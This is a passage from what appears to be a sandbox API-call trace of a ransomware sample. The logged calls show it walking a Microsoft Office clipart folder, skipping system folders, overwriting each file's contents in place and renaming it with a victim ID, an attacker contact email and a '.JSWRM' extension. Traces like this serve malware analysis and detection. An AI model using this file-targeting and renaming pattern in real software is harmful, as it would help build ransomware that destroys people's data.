dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.346] CloseHandle (hObject=0x314) returned 1 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0096.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0096.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0096.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0096.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0096.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.347] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00483_.WMF", cAlternateFileName="")) returned 1 [0096.347] lstrcmpiW (lpString1="SO00483_.WMF", lpString2=".") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="..") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="...") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="windows") returned -1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="recovery") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="perflogs") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="documents and settings") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="system volume information") returned -1 [0096.348] lstrcmpiW (lpString1="SO00483_.WMF", lpString2="msocache") returned 1 [0096.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00483_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00483_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00483_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0096.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00483_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00483_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00483_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0096.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.349] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11192) returned 1 [0096.349] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24d210 [0096.349] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2bb0, lpOverlapped=0x0) returned 1 [0096.398] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.398] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2bb0, lpOverlapped=0x0) returned 1 [0096.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.398] CloseHandle (hObject=0x314) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0096.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0096.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0096.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0096.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0096.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0096.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.400] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e58, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00486_.WMF", cAlternateFileName="")) returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2=".") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="..") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="...") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="windows") returned -1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="recovery") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="perflogs") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="documents and settings") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="system volume information") returned -1 [0096.400] lstrcmpiW (lpString1="SO00486_.WMF", lpString2="msocache") returned 1 [0096.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00486_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00486_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00486_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00486_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00486_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00486_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0096.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.402] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7768) returned 1 [0096.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e50) returned 0x205850 [0096.402] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e50, lpOverlapped=0x0) returned 1 [0096.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.404] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e50, lpOverlapped=0x0) returned 1 [0096.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.404] CloseHandle (hObject=0x314) returned 1 [0096.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0096.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0096.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0096.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0096.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0096.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.406] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00505_.WMF", cAlternateFileName="")) returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2=".") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="..") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="...") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="windows") returned -1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="recovery") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="perflogs") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="documents and settings") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="system volume information") returned -1 [0096.406] lstrcmpiW (lpString1="SO00505_.WMF", lpString2="msocache") returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00505_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00505_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00505_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00505_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00505_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00505_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.407] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2724) returned 1 [0096.407] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaa0) returned 0x22fd48 [0096.407] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xaa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xaa0, lpOverlapped=0x0) returned 1 [0096.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.409] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xaa0, lpOverlapped=0x0) returned 1 [0096.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0096.409] CloseHandle (hObject=0x314) returned 1 [0096.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0096.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0096.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0096.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF" (normalized: "c:\\program files\\microsoft 